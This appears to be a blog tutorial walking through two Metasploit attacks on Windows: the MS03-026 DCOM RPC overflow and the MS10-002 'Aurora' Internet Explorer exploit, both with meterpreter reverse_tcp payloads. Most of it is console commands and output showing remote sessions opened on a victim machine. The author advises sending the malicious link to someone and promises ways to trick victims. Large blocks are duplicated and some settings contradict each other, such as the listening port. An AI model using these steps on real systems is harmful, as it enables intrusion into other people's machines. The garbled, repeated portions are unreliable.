This module exploits a stack buffer overflow in the RPC
Service. It can exploit English versions of:
- Windows
NT 4.0 SP3
- Windows
2000
- Windows
XP
- Windows
2003
Default port:135
Okay, let's start.
Type:
Okay, let's start.
Type:
PHP Code:
use exploit/windows/dcerpc/ms03_026_dcom
Now let's add payload:
PHP Code:
set payload windows/meterpreter/reverse_tcp
Next, we need to see what options we need to set. Set
LHost to match your local IP and RHost to match the victim's. And set Lport to
your desired port.
PHP Code:
set lhost 192.168.2.100
ser rhost 192.168.2.105
set lport 4444
ser rhost 192.168.2.105
set lport 4444
Now type exploit and if the attack was successful, you will get meterpreter session.
Code:
msf > use
exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf
exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set lport 4443
lport => 4443
msf exploit(ms03_026_dcom) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on 192.168.2.103:4443
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
msf exploit(ms03_026_dcom) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf
exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set lport 4443
lport => 4443
msf exploit(ms03_026_dcom) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on 192.168.2.103:4443
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
Aurora is browser based exploit, which means that payload
is injected through the browser on the victim machine. Aurora exploits a memory
corruption flaw in Internet Explorer 6. It is very outdated, but I picked this
one for it's historical value. It was used in Operation Aurora by a group of
hackers who compromised a large number of major
Let's start by choosing aurora.
PHP Code:
Use exploit/windows/browser/ms10_002_aurora
Next, set payload to reverse meterpreter.
PHP Code:
set payload windows/meterpreter/reverse_tcp
Now we need to input LHost, Lport(for Payload) and
SrvHost for aurora. Lhost and SrvHost have to be the same. You can also change
srvport, but you can leave it to 8080 (Default) if you want.
PHP Code:
Set LHost 192.168.2.103
Set LPort 4444
Set SrvHost 192.168.2.103
Set LPort 4444
Set SrvHost 192.168.2.103
You can also change uripath, the way link will look like. If you just leave it, it will add some random stuff at the end of url like:
http://192.168.2.103:jghsajksauf
So we are going to change it to /.
PHP Code:
set uripath /
Type exploit, and server will start. Send the generated
link to someone and meterpreter session will open. I will later show advanced
methods of tricking a victim to open it.
Example:
Example:
Code:
msf > search aurora
Matching Modules
==
Name Disclosure Date Rank Description
---- -- ---- --
exploit/windows/browser/ms10_002_aurora 2010-01-14 normal Internet Explorer "Aurora" Memory Corruption
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set lhost 192.168.2.103
lhost => 192.168.2.103
smsf exploit(ms10_002_aurora) > set lport 4444
lport => 4444
msf exploit(ms10_002_aurora) > set srvport 80
srvport => 80
msf exploit(ms10_002_aurora) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- -- -- --
SRVHOST 192.168.2.103 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- -- -- --
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 192.168.2.103 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set uripath /
uripath => /
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.2.105
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
Matching Modules
==
Name Disclosure Date Rank Description
---- -- ---- --
exploit/windows/browser/ms10_002_aurora 2010-01-14 normal Internet Explorer "Aurora" Memory Corruption
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set lhost 192.168.2.103
lhost => 192.168.2.103
smsf exploit(ms10_002_aurora) > set lport 4444
lport => 4444
msf exploit(ms10_002_aurora) > set srvport 80
srvport => 80
msf exploit(ms10_002_aurora) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- -- -- --
SRVHOST 192.168.2.103 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- -- -- --
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 192.168.2.103 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set uripath /
uripath => /
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.2.105
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
More Info:
Code:
Name: Internet Explorer
"Aurora" Memory Corruption
Module: exploit/windows/browser/ms10_002_aurora
Version: 14034
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
unknown
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- -- -- --
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1000
Avoid: 1 characters
Description:
This module exploits a memory corruption flaw in Internet Explorer.
This flaw was found in the wild and was a key component of the
"Operation Aurora" attacks that lead to the compromise of a number
of high profile companies. The exploit code is a direct port of the
public sample published to the Wepawet malware analysis site. The
technique used by this module is currently identical to the public
sample, as such, only Internet Explorer 6 can be reliably exploited.
Module: exploit/windows/browser/ms10_002_aurora
Version: 14034
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
unknown
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- -- -- --
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1000
Avoid: 1 characters
Description:
This module exploits a memory corruption flaw in Internet Explorer.
This flaw was found in the wild and was a key component of the
"Operation Aurora" attacks that lead to the compromise of a number
of high profile companies. The exploit code is a direct port of the
public sample published to the Wepawet malware analysis site. The
technique used by this module is currently identical to the public
sample, as such, only Internet Explorer 6 can be reliably exploited.
No comments:
Post a Comment